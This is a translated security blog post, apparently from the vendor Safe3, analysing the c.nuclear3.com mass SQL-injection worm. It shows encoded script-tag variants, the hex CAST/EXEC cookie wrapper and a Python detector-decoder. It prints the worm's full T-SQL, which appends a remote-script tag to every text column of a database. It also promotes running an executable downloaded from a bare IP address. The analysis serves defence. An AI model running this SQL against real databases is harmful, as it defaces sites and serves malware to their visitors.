A complete solution for the c.nuclear3.c%6F%6D/css/c.js mass injection

Web-page trojan injection ("挂马") has been raging lately, and commercialised hacking groups are behind more and more of it. A Google search for /css/c.js></Script> shows that hongxiu.com, MSN China, 东方财经网 and others have been compromised: about 498,000 results, tens of thousands of injected sites.

The injected tag keeps mutating: <Script Src=http://c.nuclear3.c%6F%6D/css/c.js></Script>, where it is always the http://c.nuclear3.com/ part that changes. Variants seen so far include

    <Script Src=http://c.nu%63lear3.com/css/c.js></Script 

    <Script Src=http://c.nuclear3%2E%63om/css/c.js></Script

    <Script Src=http://%63.nuclear3.com/css/c.js></Script

and so on.

Safe3 (安全伞) finally captured the trojan's original form: a case-mangled T-SQL statement that declares @S as NVARCHAR(4000), sets it to CAST(0x<hex> AS NVARCHAR(4000)) and calls EXEC(@S), so the real commands travel as a hex-encoded UTF-16 string rather than as readable SQL.


This trojan injects through cookie-based SQL injection, uses search engines to find vulnerable sites automatically and injects them in turn, so it behaves somewhat like a worm.

The SQL inside the CAST decodes to:

    Declare @T Varchar(255),@C Varchar(255)
    -- Cursor over every column of every user table (Xtype='u') whose type is a
    -- text-bearing one: 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar
    Declare Table_Cursor Cursor For
        Select A.Name,B.Name From Sysobjects A,Syscolumns B
        Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
    Open Table_Cursor
    Fetch Next From Table_Cursor Into @T,@C
    While(@@Fetch_Status=0)
    Begin
        -- Append the script tag to the existing value of each such column
        Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<Script Src=http://c.nuclear3.c%6F%6D/css/c.js></Script>''')
        Fetch Next From Table_Cursor Into @T,@C
    End
    Close Table_Cursor
    Deallocate Table_Cursor
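As an added example (not code from the original post), the following Python decoder unpacks the CAST(0x... AS NVARCHAR) wrapper the way a WAF or log-review script would, normalises the percent-encoded script src variants listed above to one canonical URL, and flags the worm's signature. The sample cookie value is constructed here by re-encoding the decoded SQL from the post.

```python
import re
from urllib.parse import unquote

# The worm's wrapper: CAST(0x<hex> AS NVARCHAR(n)), written in mixed case to dodge naive filters.
CAST_HEX = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+nvarchar", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script\s+src=([^\s>]+)", re.IGNORECASE)


def decode_cast_payload(injected):
    """Return the SQL hidden inside CAST(0x... AS NVARCHAR), or None if there is none.
    NVARCHAR is UTF-16LE, so every character is two bytes (0x4400 -> 'D')."""
    m = CAST_HEX.search(injected)
    if not m or len(m.group(1)) % 4:          # no wrapper, or not whole UTF-16 code units
        return None
    return bytes.fromhex(m.group(1)).decode("utf-16-le", errors="replace")


def canonical_script_urls(sql):
    """Collect <script src=...> URLs and undo percent-encoding tricks such as c%6F%6D."""
    urls = []
    for url in SCRIPT_SRC.findall(sql):
        prev = None
        while url != prev:                     # decode until stable to beat double encoding
            prev, url = url, unquote(url)
        urls.append(url.lower())
    return urls


def is_mass_injection(sql):
    """Signature of this family: walks sysobjects/syscolumns, UPDATEs every text column
    and appends a <script> tag to the existing value."""
    s = sql.lower()
    return all(k in s for k in ("sysobjects", "syscolumns", "update", "<script"))


# Constructed sample: the decoded SQL from the post, re-encoded the way the worm sends it.
DECODED = (
    "Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name "
    "From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 "
    "Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C "
    "While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),"
    "['+@C+']))+''<Script Src=http://c.nuclear3.c%6F%6D/css/c.js></Script>''')"
    "Fetch Next From Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor"
)
SAMPLE_COOKIE = (";DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x"
                 + DECODED.encode("utf-16-le").hex().upper()
                 + " aS NvArChAR(4000));ExEc(@S);--")

if __name__ == "__main__":
    sql = decode_cast_payload(SAMPLE_COOKIE)
    print(is_mass_injection(sql), canonical_script_urls(sql))
```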

Safe3 (安全伞) 2009 Enterprise Edition effectively blocks this kind of disguised injection.

Official download: http://121.207.254.246/safe3.rar

Tip: the software is commercial, but so that users are not left exposed, you can simply run inu.exe from the Safe3 directory after downloading; the firewall is then installed and can be used without restriction. For the other features it is best to buy a licence; we hope everyone will support the software.

Original article: https://www.cnblogs.com/Safe3/p/1356158.html